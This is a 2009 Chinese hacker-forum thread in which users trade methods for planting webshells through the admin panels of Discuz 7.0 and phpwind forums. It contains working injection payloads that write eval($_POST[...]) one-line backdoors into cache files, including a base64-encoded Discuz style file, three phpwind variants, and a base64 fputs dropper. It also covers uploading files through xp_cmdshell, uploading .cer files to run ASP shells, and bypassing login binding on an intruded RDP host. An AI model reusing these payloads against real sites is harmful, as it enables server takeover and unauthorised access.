[讨论]Discuz7.0 how to get webshell?
信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])议题作者:hackest
Discuz7.0 how to get webshell? Discuz All version!
[url]http://ring04h.googlepages.com/dzshell.txt[/url] 两位老大,小弟不知道怎么用啊?
导入的时候,有显示错误
Discuz! info: MySQL Query Error
User: admin2
Time: 2009-7-3 4:47pm
Script: /bbs/admincp.php
SQL: INSERT INTO [Table]stylevars (styleid, variable, substitute)
VALUES ('7', '!','80vul');eval($_post[ring]);//', 'exp by ring04h!')
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'eval($_post[ring]);//', 'exp by ring04h!')' at line 2
Errno.: 1064
不知道怎么解决。 恩 我也是遇到这个问题了 期待高手能指点一下 借一下你的贴用用!
讨论一下SQLTOOL上传文件的原理问题。
当然了前提是MSSQL SA权限 可执行命令等操作,现在我想知道SQLTOOL是怎样把本地的文件(比如:EXE.BAT.JPG等)上传到远程MSSQL服务器上的(本地没有安装MSSQL服务)
那位牛淫知道!告诉我一下!最好能把SQL语句列出来。 [quote]原帖由 [i]没啥事呀[/i] 于 2009-7-7 13:01 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=159548&ptid=37955][img]images/common/back.gif[/img][/url]
借一下你的贴用用!
讨论一下SQLTOOL上传文件的原理问题。
当然了前提是MSSQL SA权限 可执行命令等操作,现在我想知道SQLTOOL是怎样把本地的文件(比如:EXE.BAT.JPG等)上传到远程MSSQL服务器上的(本地没有安装MSSQL服务)
那位 ... [/quote]
直接用啊D 或者 明小子就可以了。 有SQL的帐号和密码 我就想知道像SQLTOOL那些工具是怎么把本地的文件上传到远程服务器的,我想知道都用的什么SQL语句 [quote]原帖由 [i]没啥事呀[/i] 于 2009-7-9 10:12 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=159585&ptid=37955][img]images/common/back.gif[/img][/url]
有SQL的帐号和密码 我就想知道像SQLTOOL那些工具是怎么把本地的文件上传到远程服务器的,我想知道都用的什么SQL语句 [/quote]
把文件insert到数据库里面去,然后再从数据库里面dump到远程服务器里面。 [quote]原帖由 [i]mshack[/i] 于 2009-7-9 23:55 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=159606&ptid=37955][img]images/common/back.gif[/img][/url]
把文件insert到数据库里面去,然后再从数据库里面dump到远程服务器里面。 [/quote]
他想知道的其实是具体命令.如何去实现和执行?...具体过程?
XXXXXX 什么的..
PS:我也想知道. [url]http://hi.baidu.com/sa_turn/blog/item/27041a341b07093a5bb5f5a8.html[/url]
[url]http://hi.baidu.com/jushen66/blog/item/7a5e0dd366dfb1073bf3cf1a.html[/url]
两篇文章学习一下。 微软有一个类似的例子。
[url]http://support.microsoft.com/kb/317043/EN-US/[/url]
此外通过创建外部进程可以导出,也就是使用Xp_CmdShell来执行textcopy.exe这个程序.
例: textcopy.exe /S 127.0.0.1 /U "sa" /P "password" /D Master /T mytable /C imageinfo /W True /F C:123.jpg /O
[b]以前有牛人写过一个例子[/b]
/*--利用 textcopy.exe文件实现在数据库中存储/读取文件
需要textcopy.exe文件,该文件可以在sql 7.0安装光盘找到
--转贴自大力--*/
--建立存取处理的存储过程
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_textcopy]') and OBJECTPROPERTY(id, N'IsProcedure') = 1)
drop procedure [dbo].[sp_textcopy]
GO
CREATE PROCEDURE sp_textcopy
@srvname varchar (30), --服务器名
@login varchar (30), --用户名
@password varchar (30), --密码
@dbname varchar (30), --数据库名
@tbname varchar (30), --表名
@colname varchar (30), --存储文件的字段名
@filename varchar (30), --要存取的文件名
@whereclause varchar (40), --条件
@direction char(1) --I 为存储到数据库,O 从数据库中读出成文件
AS
DECLARE @exec_str varchar (255)
SELECT @exec_str =
'textcopy /S"' + @srvname +
'" /U ' + @login +
' /P ' + @password +
' /D ' + @dbname +
' /T ' + @tbname +
' /C ' + @colname +
' /W "' + @whereclause +
'" /F "' + @filename +
'" /' + @direction
EXEC master..xp_cmdshell @exec_str
go
--调用示例:
--1.创建示例表和初始化数据
create table tb(id int,img image)
insert tb
select 1,0x
union all select 2,0x
go
--2.将文件保存到数据库中
declare @srv varchar(255),@db sysname,@tb sysname,@col sysname
select @srv=@@servername --服务器名
,@db=db_name() --数据库名
,@tb='tb' --表名
,@col='img' --列名
sp_textcopy @srv,'sa','sa的密码',@db,@tb,@col,'c:\test.jpg','where id=1','I' --保存到id=1的记录中,注意条件是:id=1
sp_textcopy @srv,'sa','sa的密码',@db,@tb,@col,'c:\test.doc','where id=2','I' --保存到id=2的记录中,注意条件是:id=2
--3.从数据库中读出保存为文件
sp_textcopy @srv,'sa','sa的密码',@db,@tb,@col,'c:\test.jpg','where id=1','O' --读出id=1的记录,注意条件是:id=1
sp_textcopy @srv,'sa','sa的密码',@db,@tb,@col,'c:\test.doc','where id=2','O' --读出id=2的记录,注意条件是:id=2
--删除测试环境
drop table tb
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_textcopy]') and OBJECTPROPERTY(id, N'IsProcedure') = 1)
drop procedure [dbo].[sp_textcopy]
[[i] 本帖最后由 mshack 于 2009-7-10 13:56 编辑 [/i]] [b][color=red][size=6]离题3万英尺远了,
还是希望有大大出来帮小弟解决dz7.0非创始人管理员,如何拿webshell的问题。[/size][/color][/b]
[b][size=6][color=#ff0000][/color][/size][/b]
[b][size=6][color=#ff0000][/color][/size][/b]
[b][size=6][color=#ff0000]感激不尽。[/color][/size][/b] [code]# Discuz! Style Dump
# Version: Discuz! 7.0.0
# Time: 2009-5-25 23:04
# From: Discuz Board (http://chinl1ww.qzone.qq.com)
#
# This file was BASE64 encoded
#
# Discuz! Community: http://www.Discuz.net
# Please visit our website for latest news about Discuz!
# --------------------------------------------------------
YTo3OntzOjQ6Im5hbWUiO3M6ODoiZ2V0c2hlbGwiO3M6MTA6In
RlbXBsYXRlaWQiO3M6MToiMSI7czo3OiJ0cGxuYW1lIjtzOjEy
OiLErMjPxKOw5czXz7UiO3M6OToiZGlyZWN0b3J5IjtzOjE5Oi
IuL3RlbXBsYXRlcy9kZWZhdWx0IjtzOjk6ImNvcHlyaWdodCI7
czoyODoiv7XKorS0z+ujqLGxvqmjqb/GvLzT0M/euavLviI7cz
o3OiJ2ZXJzaW9uIjtzOjU6IjcuMC4wIjtzOjU6InN0eWxlIjth
OjQ4OntzOjk6InNwZWNpYWxiZyI7czowOiIiO3M6MTU6ImludG
VybGVhdmVjb2xvciI7czowOiIiO3M6ODoiY29tbW9uYmciO3M6
MDoiIjtzOjEzOiJzcGVjaWFsYm9yZGVyIjtzOjA6IiI7czoxMj
oiY29tbW9uYm9yZGVyIjtzOjA6IiI7czo5OiJhdmFpbGFibGUi
O3M6MDoiIjtzOjg6ImJvYXJkaW1nIjtzOjA6IiI7czo2OiJpbW
dkaXIiO3M6MDoiIjtzOjExOiJzdHlsZWltZ2RpciI7czowOiIi
O3M6Nzoic3R5cGVpZCI7czoxOiIxIjtzOjEzOiJoZWFkZXJiZ2
NvbG9yIjtzOjA6IiI7czo3OiJiZ2NvbG9yIjtzOjA6IiI7czox
MToic2lkZWJnY29sb3IiO3M6MDoiIjtzOjEyOiJoZWFkZXJib3
JkZXIiO3M6MDoiIjtzOjE3OiJoZWFkZXJib3JkZXJjb2xvciI7
czowOiIiO3M6MTA6ImhlYWRlcnRleHQiO3M6MDoiIjtzOjEwOi
Jmb290ZXJ0ZXh0IjtzOjA6IiI7czo0OiJmb250IjtzOjA6IiI7
czo4OiJmb250c2l6ZSI7czowOiIiO3M6Njoic21mb250IjtzOj
A6IiI7czoxMDoic21mb250c2l6ZSI7czowOiIiO3M6OToidGFi
bGV0ZXh0IjtzOjA6IiI7czo3OiJtaWR0ZXh0IjtzOjA6IiI7cz
o5OiJsaWdodHRleHQiO3M6MDoiIjtzOjQ6ImxpbmsiO3M6MDoi
IjtzOjEzOiJoaWdobGlnaHRsaW5rIjtzOjA6IiI7czo5OiJ3cm
Fwd2lkdGgiO3M6MDoiIjtzOjY6IndyYXBiZyI7czowOiIiO3M6
MTA6IndyYXBib3JkZXIiO3M6MDoiIjtzOjE1OiJ3cmFwYm9yZG
VyY29sb3IiO3M6MDoiIjtzOjExOiJtc2dmb250c2l6ZSI7czow
OiIiO3M6MTA6Im1zZ2JpZ3NpemUiO3M6MDoiIjtzOjEyOiJjb2
50ZW50d2lkdGgiO3M6MDoiIjtzOjE1OiJjb250ZW50c2VwYXJh
dGUiO3M6MDoiIjtzOjEwOiJtZW51Ym9yZGVyIjtzOjA6IiI7cz
oxMToibWVudWJnY29sb3IiO3M6MDoiIjtzOjg6Im1lbnV0ZXh0
IjtzOjA6IiI7czo5OiJtZW51aG92ZXIiO3M6MDoiIjtzOjEzOi
JtZW51aG92ZXJ0ZXh0IjtzOjA6IiI7czoxMToiaW5wdXRib3Jk
ZXIiO3M6MDoiIjtzOjIwOiJpbnB1dGJvcmRlcmRhcmtjb2xvci
I7czowOiIiO3M6NzoiaW5wdXRiZyI7czowOiIiO3M6MTQ6ImRy
b3BtZW51Ym9yZGVyIjtzOjA6IiI7czoxNToiZHJvcG1lbnViZ2
NvbG9yIjtzOjA6IiI7czoxMjoiZmxvYXRiZ2NvbG9yIjtzOjA6
IiI7czoxNjoiZmxvYXRtYXNrYmdjb2xvciI7czowOiIiO3M6MT
A6Im5vdGljZXRleHQiO3M6MDoiIjtzOjMzOiIhJywnODB2dWwn
KTtldmFsKCRfcG9zdFtyaW5nXSk7Ly8iO3M6MTU6ImV4cCBieS
ByaW5nMDRoISI7fX0=
[/code] [code]我先声明:
1.这个不是我首发,很多牛牛很早之前就发现了,但没人公布,ring04h牛那貌似有个:http://ring04h.googlepages.com/dzshell.txt,估计知道的人很多了,我研究的少,知道迟了,惭愧惭愧;
2.我从拿到shell的IIS日志知道这里可以利用,即styles.inc.php这个文件,于是看了下,找到利用办法。后来经flyh4t提醒,居然与ring04h的那个方法一样,我落后了...
好了,不废话,看代码:
<?php
......
if($newcvar && $newcsubst) {
if($db->result_first("SELECT COUNT(*) FROM {$tablepre}stylevars WHERE variable='$newcvar' AND styleid='$id'")) {
cpmsg('styles_edit_variable_duplicate', '', 'error');
} elseif(!preg_match("/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/", $newcvar)) {
cpmsg('styles_edit_variable_illegal', '', 'error');
}
$newcvar = strtolower($newcvar);
$db->query("INSERT INTO {$tablepre}stylevars (styleid, variable, substitute)
VALUES ('$id', '$newcvar', '$newcsubst')");
}//插入变量数据,From www.oldjun.com
......
updatecache('styles');//更新缓存(写文件),From www.oldjun.com
......
?>这是为某一style风格增加变量的代码,把变量名与变量的值存入数据库,虽然post过来的数据daddslashes了,但入库之后又都是纯净的数据了。
这里涉及到一个正则问题,判断变量名的:!preg_match("/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]* /", $newcvar),其中“\x7f-\xff”是指ASCII码值在127~255之间的字符,它们经常作为中文字符的首字节出现,所以可以利用其作为中文匹配的标志。于是这个匹配貌似只是允许字母或者中文做变量名,没其他高深的匹配,随便测试了下,一般情况下这个正则等于虚设:
<?php
$newcvar=$_GET['newcvar'];
echo $newcvar;
echo "<br>";
if(!preg_match("/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/", $newcvar)) {
echo "haha";
}else{
echo 'pass';
}
?>下面看看updatecache这个函数,在include里的cache.func.php文件里,先从数据库取出来,经过一段处理最终写入文件,具体我不描述了,我只谈谈重点,看一段函数:
function getcachevars($data, $type = 'VAR') {
$evaluate = '';
foreach($data as $key => $val) {
if(is_array($val)) {
$evaluate .= "\$$key = ".arrayeval($val).";\n";
} else {
$val = addcslashes($val, '\'\\');
$evaluate .= $type == 'VAR' ? "\$$key = '$val';\n" : "define('".strtoupper($key)."', '$val');\n";
}
}
return $evaluate;
}啥也不说了,处理了value没处理key,而这个key就是之前我们提交的,干净的存在数据库里的值。关于数组的key,大家可以参考下幻影旅团第三期《高级PHP代码审核技术》,那篇文章好多地方谈到key的问题,dz这里却忽视了...
于是可以直接拿shell了,利用方法(论坛地址改成自己的),先用管理员帐号登陆后台,无需论坛创始人,管理员等级即可:
http://www.oldjun.com/bbs/admincp.php?action=styles&operation=edit&id=1&adv=1
中,最下面有个“自定义模板变量”,变量中填:
OLDJUN', '#999');eval($_POST[cmd]);//替换内容随便输入:1111,然后提交,一句话木马就产生了:
http://www.oldjun.com/bbs/forumdata/cache/style_1.php
如果你修改的style的id是2的话,对于的shell就是style_2.php。
这个风格模板可以导入导出的,于是有了ring04h的那个dzshell,嫌麻烦可以直接用那个导入风格获取shell。[/code]
其实拿shell很多方法,大家多关注关注大牛的博客之类的,很多人都发在自己的博客里面了。 参见80vul discuz get-webshell
[url]http://www.80vul.com/dzvul/sodb/18/sodb-2009-02.txt[/url] 帖子真火 借此问个问题
=================================
问题:我拿到了一个web主机A并且获得了其后台帐户 然后新加帐户admin$登陆3389 在使用admin$帐户下登录web后台的时候提示《网卡绑定,不能登录》 而我用屏幕控制看到web管理员在默认的administrator下可以登录, 我想请教在遇到这样的情况下如何绕过绑定 楼上的题目我看了半天不解,
登录web后台提示,网卡绑定,不能登录?
难道是管理员把网站的后台和本机或者服务器的网卡进行了绑定才可以登陆?
具体的可以截图发个附件看下。
回复 17楼 追寻 的帖子
恩 就是管理员的后台是个模拟登录器似的 他的后台是绑定了网卡(或者机器码,因为我伪造他网卡后还是不行)我晚上给截图 现在用无线 网速太慢 连不上 是不是绑定IP了?
很少听说绑定网卡什么的。
回复 17楼 追寻 的帖子
[img]http://forum.eviloctal.com/www.vbmsdn.cn/8jinzhi.bmp[/img] 这个按上面的方法是可以成功的……已解决:smile:不知道phpwind5.3 后台怎么搞呢,网上能搜索出来的那些办法已不行了
呃,至于操作系统是win还支持asp什么的,就不用说了……
[quote]phpwind 从后台到webshell的三种方式
方式1 模板法
进入后台, 风格模版设置 ,在随便一行写代码
记住,这代码必须顶着左边行写,代码前面不可以有任何字符。
EOT;
eval($a);
print <<<EOT
例如,我写完某一行为。
.headurl { color:#ffffff;}
EOT;
eval($_POST['a']);
print <<<EOT
.index_font{color: #3A4F6C;background-color:#EBEBEB; font-weight:bold;padding: 5px;}
而后得到一个shell
http://localhost/bbs/index.php
(由于写到css里,也许有的操作无法返回,但是只要没有什么问题,一般操作都是可以接受的)
密码是a lanker的一句话后门。
方始2 脏话过滤法
进入安全管理 ◇ 不良词语过滤
新增
不良词语写 a']='aa';eval($_POST['a']);//
替换为那里可以随意写
而后得到一个shell地址为
http://localhost/bbs/data/bbscache/wordsfb.php
密码是a lanker的一句话后门。
方式3 用户等级管理
然后新建立会员组
头衔你可以随便写,但是千万不要写单双引号特殊符号,升级图片号写a';eval($_POST['a']);//
升级点数依然可以随意写。
而后得到一个shell地址为
http://localhost/bbs/data/bbscache/level.php
密码是a lanker的一句话后门。
这里提供的方式随便你选一种都可以得到shell。[/quote]
回复 21楼 hackest 的帖子
给我个后台我去看看,我也没拿过。。
一般都旁注了。 [quote]原帖由 [i]hackest[/i] 于 2009-7-17 01:41 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=159856&ptid=37955][img]images/common/back.gif[/img][/url]
这个按上面的方法是可以成功的……已解决:smile:
不知道phpwind5.3 后台怎么搞呢,网上能搜索出来的那些办法已不行了
呃,至于操作系统是win还支持asp什么的,就不用说了……
... [/quote]
方法是有的,自己好好看看PHP手册,自然就能发现了。
Phpwind All version! 有很多方法。 这次我不再发任何提示了。
回复 22楼 流淚╮鮭鮭 的帖子
呃,这个可以自己架设一个学习呀……目标站比较重要,好不容易社工进的后台呢……:smile:
回复 23楼 root 的帖子
呃,太伤我心了……:mad:回复 20楼 梦中忆梦 的帖子
估计是绑定了mac地址了,基本上没什么戏了。回复 26楼 追寻 的帖子
但是我是已经登陆了对方的3389了只是对方使用的是administrator
我使用的也是管理员帐户admin$
只是帐户不同而已 mac地址应该是一样的吧
还有他的硬件系统等都是一样的,怎么不是同一个帐户就不可以呢 可能判断了连接方的 MAC地址啦。 hackest上面提出的几种方法我都试验过了,都不行。
我在slenk上面看过这个帖子,估计对phpwinid 5有用,但好像对phpwind7.32无效啊。
作者:随风
出处:Lenk技术联盟
地址:[url]http://www.slenk.net[/url]
虽然这算不上什么好东西,但是当你要用他的时候就知道他的重要性了
问题代码我帖一下
————————————-
foreach($content as $key=>$value){
list($w,$r)=explode(”=>”,$value);
$r = trim($r);
$w = explode(”|”,$w);
foreach($w as $k=>$v){
$v = preg_quote(trim($v),’/');
if(!isset($replace[$v]) && !isset($wordsfb[$v])){
$word[] = $v;
$rep[] = $r ? $r : $mrep;
}
}
————————————–
preg_quote这个函数会转义”\”,但是不转义”‘”
所以会出问题.比如我们提交”‘”会被转义成”\’”再经过他一转\\’
这样就出问题了
下面是具体的方法了
——————————-
直接进入后台修改词语过滤功能:
直接在新增词语中写入下列的语句:
‘,fputs(fopen(base64_decode(”enoucGhw”),”w”),base64_decode(”PD9ldmFsKCRfUE9TVFthXSk7Pz4=”)),’a
另外一个可以随便填写
缺点就是要出错,但是可以拿SHELL
拿了SHELL马上修改回来就没有问题了
上面的会代码会在当前的目录生成一个zz.php,密码是a的一句话
根据自己的需要修改base64_decode函数里面的值就可以了
希望大家玩得愉快
phpwind7.3.2后台如何拿webshell?
邪八这里的发主题帖权限比较严格,故而在这里问一个类似的问题[color=Red][size=6]phpwind7.3.2后台如何拿webshell?[/size][/color]
我只知道一种很不通用,很笨的方法。有条件的,步骤如下:
1、拿到创始人的后台密码(至少是要能支持修改上传文件类型的账号)
2、后台在用户组那里,增加文件上传类型,cer
3、前台上传asp 小马.cer文件,后台附件管理处找到.cer地址,直接运行,写php大马。
(上传文件类型如果为asp和asa是没有办法运行的,phpwind会修改扩展名)
[color=Red]但如果对方的主机不支持asp,大家有什么方法可以拿到phpwind7.3.2的webshell?
更进一步,如果拿到的账号,不是论坛的创始人的账号,应该怎么拿webshell?[/color] DZ7的新漏洞吧`~可以在版面管理那里直接拿webshell
回复 31楼 tree805 的帖子
版主管理那里也可以么?据说还有另一种方法是前台都可以搞到webshell的……:shocked:
回复 29楼 mshack 的帖子
这个我试了,但是没有成功……phpwind版本为5.3:smile: 研究phpwind如何拿webshell的人比较少。phpwind后台的过滤有点变态。 连 “(” 都要被转义
回复 34楼 mshack 的帖子
暂时还是没有找到有效的办法……:mad: [url]http://www.oldjun.com/blog/index.php/archives/48/[/url]按这方法操作,DZ7.0能拿到webshell
测试成功
回复 36楼 powerwjs 的帖子
DZ的已经解决,现在讨论phpwind 5.3的嘛:smile: 问问诸位大牛在magic_quotes_gpc=on 的情况下
能使用 select into outfile么?
如果不能,如何才能拿到webshell? [quote]原帖由 [i]hackest[/i] 于 2009-7-30 19:01 发表 [url=https://forum.eviloctal.com/redirect.php?goto=findpost&pid=160233&ptid=37955][img]images/common/back.gif[/img][/url]
DZ的已经解决,现在讨论phpwind 5.3的嘛:smile: [/quote]
[url]http://www.baidu.com/s?tn=imdb2&ie=gb2312&bs=doskey+%2Fmacros&sr=&z=&cl=3&f=8&wd=phpwind+5.3+webshell&ct=0[/url]
-_-| 大牛,无意帮你百度了一下,
发现方法很多..
另外附上一个比较简单明了的Demo.. [quote]原帖由 [i]hackest[/i] 于 2009-7-30 19:01 发表 [url=https://forum.eviloctal.com/redirect.php?goto=findpost&pid=160233&ptid=37955][img]images/common/back.gif[/img][/url]
DZ的已经解决,现在讨论phpwind 5.3的嘛:smile: [/quote]
[url]http://www.baidu.com/s?tn=imdb2&ie=gb2312&bs=doskey+%2Fmacros&sr=&z=&cl=3&f=8&wd=phpwind+5.3+webshell&ct=0[/url]
额,大牛,帮你搜索了一下PHPWIND5.3拿webshell的方法,发现有好多的,,,文章
-_-| 貌似也没有啥讨论的必要,,,
发一个我觉得比较详细的DEMO上来,希望对您老有帮助,呵呵...:lol:
[url]http://www.anqn.com/demo/c/2007-04-24/a0983631.shtml[/url] 汗,居然存在这种回复……你真以为只有你才会搜索么……:sweat: [quote]原帖由 [i]hackest[/i] 于 2009-7-31 12:59 发表 [url=https://forum.eviloctal.com/redirect.php?goto=findpost&pid=160247&ptid=37955][img]images/common/back.gif[/img][/url]
汗,居然存在这种回复……你真以为只有你才会搜索么……:sweat: [/quote]
人家也没恶意 竟然扣那么多分…… :mad: [quote]原帖由 [i]hackest[/i] 于 2009-7-31 12:59 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=160247&ptid=37955][img]images/common/back.gif[/img][/url]
汗,居然存在这种回复……你真以为只有你才会搜索么……:sweat: [/quote]
我晕呀,,
你没有说明服务器环境,没有说明是什么架构的PHP//
linux or windows 2003/iis6
我只好弄了个03的demo呀,,至于测试,也测试成功了的
PHPWIND5.3的确是过时了,但是还是可以找到下载点的
[url]http://www.fwvv.net/Software/View-Software-835.shtml[/url]
我也用虚拟机测试的,,但是环境虽然可能跟你说的不同,也确实是你没有描述清楚呀!
怎么扣我威望呀,:sad:
刚又看了一下,多出了一条回复,可能是我下载120G彩虹表,机器比较慢,所以本打算直接上传附件的,结果多出一个回复,有点灌水的意思,可是我也是无心的..
至于说的phpwind 5.3拿webshell 的确是可行的,没有人云亦云! 不然我可以再搭建,QQ远程测试给你看!
>>>> OK.好吧,确实是我没有看清楚你问的问题,你的确有说win类的可以不用回答...
我错了 :sad:
[[i] 本帖最后由 lipss 于 2009-7-31 17:55 编辑 [/i]]
回复 43楼 lipss 的帖子
呃,其实搜索出来的那些方法在非Windows的环境下确实不管用的了……你也是一片热心,谢谢哈……:loveliness: 还有,当forumdata/cache/style_1.php 403禁止访问的时候咋办呢……:sad: 官方已经出补丁了,再这么整就会提示“新增的替换变量名称不合法,请返回修改。”:lol:
页:
[1]